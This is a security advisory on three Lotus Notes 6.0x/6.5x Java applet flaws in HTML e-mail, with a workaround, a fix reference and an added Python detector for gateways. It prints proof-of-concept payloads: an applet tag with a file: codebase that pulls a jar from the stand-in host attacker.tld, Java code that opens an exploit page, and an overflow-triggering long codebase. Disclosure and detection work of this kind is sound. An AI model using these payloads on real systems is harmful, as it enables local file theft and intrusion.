Lotus Notes Java Applet vulnerabilities

Overview

Lotus Notes is a groupware/e-mail system developed by Lotus Software. Due to its security and collaboration features it’s used particularly by large organizations, government agencies, etc. IBM estimates it is used by 60 million people.

These are some technical details of three Lotus Notes 6.0x/6.5x vulnerabilities. IBM was notified during July-August 2004.

Details

The vulnerabilities involve Java applets embedded in HTML formatted e-mail messages. A contributing factor in all of the issues is that such Java applets are automatically displayed when the e-mail message is viewed.

Vulnerability 1: global file read access

An e-mail message containing a Java Applet with the codebase “file:///” gains unlimited read access to local files when the e-mail is viewed. An example HTML snippet follows:

  <applet codebase="file:///" archive="http://www.attacker.tld/applet.jar"
   width="1" height="1"></applet>

The applet’s Java bytecode needn’t be contained in the e-mail itself; it is only referenced by the archive URL. The applet gets automatically loaded when the e-mail is viewed. It has file read access on the local system (it can read whatever files the currently logged in user can). The applet can use e.g. JavaScript to relay the files to the attacker.

Vulnerability 2: launching web browser

A Java applet embedded in the same way can forcibly launch a web browser with the desired URL when an e-mail message is viewed. An example piece of Java code to do this follows:

  public void init() {
    getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html");
  }

Under default settings, Internet Explorer is launched and the attacker-supplied URL is opened in it when the e-mail message is viewed. This exposes the system to Internet Explorer vulnerabilities, greatly widening the attack surface.

Vulnerability 3: codebase buffer overflow

Opening an HTML mail message which contains an applet tag with a long codebase parameter (over 500 bytes) causes what appears to be a stack-based buffer overflow condition. It may be exploitable to run arbitrary code on the victim system when the e-mail message is viewed. This is an example piece of HTML to produce it:

 <applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA"
  code="java.applet.Applet" width=100 height=100></applet>

Exploitability of this scenario was NOT confirmed.
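The two HTML patterns above (a codebase of "file:" in vulnerability 1, and a codebase longer than about 500 bytes in vulnerability 3) are simple to recognise at a mail gateway or in incident triage. The following is an added example, not code from the advisory or from IBM: a small Python check over HTML mail bodies that flags both patterns and, since the affected Notes versions run any applet on view, reports every applet tag it finds. The sample messages are constructed for the example; the attacker.tld host is the advisory's own placeholder.

```python
import re
from html.parser import HTMLParser

# Constructed sample HTML mail bodies (not taken from real messages).
SAMPLES = {
    "file_codebase": '<html><body><applet codebase="file:///" '
                     'archive="http://www.attacker.tld/applet.jar" '
                     'width="1" height="1"></applet></body></html>',
    "long_codebase": '<applet codebase="A:' + "A" * 520 + '" '
                     'code="java.applet.Applet" width=100 height=100></applet>',
    "benign": '<html><body><p>Quarterly report attached.</p></body></html>',
    "http_applet": '<applet codebase="http://intranet.example/applets/" '
                   'code="Chart.class"></applet>',
}

# The advisory reports the overflow for codebase values over roughly 500 bytes.
CODEBASE_LIMIT = 500


class AppletFinder(HTMLParser):
    """Collect the attributes of every <applet> tag in an HTML body."""

    def __init__(self):
        super().__init__()
        self.applets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "applet":
            # Attribute names are lowercased; a missing value becomes "".
            self.applets.append({k.lower(): (v or "") for k, v in attrs})


def check_html_mail(body):
    """Return (finding, detail) tuples for one HTML mail body."""
    finder = AppletFinder()
    finder.feed(body)
    findings = []
    for applet in finder.applets:
        codebase = applet.get("codebase", "")
        # Vulnerability 1: a file: codebase grants local file read access.
        if re.match(r"\s*file:", codebase, re.IGNORECASE):
            findings.append(("file-codebase-applet", codebase))
        # Vulnerability 3: an over-long codebase triggers the overflow.
        if len(codebase.encode("utf-8")) > CODEBASE_LIMIT:
            findings.append(("long-codebase-applet", f"{len(codebase)} bytes"))
        # Any applet is auto-run on view in Notes 6.0x/6.5x, so report it too.
        findings.append(("applet-in-mail", applet.get("archive") or applet.get("code", "")))
    return findings
```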

Workaround

Disabling Java applets can be used to protect from these vulnerabilities. To disable Java applets, select File -> Preferences -> User Preferences from the Notes client menu and uncheck the option for “Enable Java applets.”

Solution

The issues have been addressed in Lotus Notes versions 6.5.4 and 6.0.5. For detailed fix information, see http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21173910&loc=en_US&cs=utf-8&cc=us&lang=en

Credits

The vulnerabilities were discovered and researched by Jouko Pynnönen, Klikki Oy, Finland.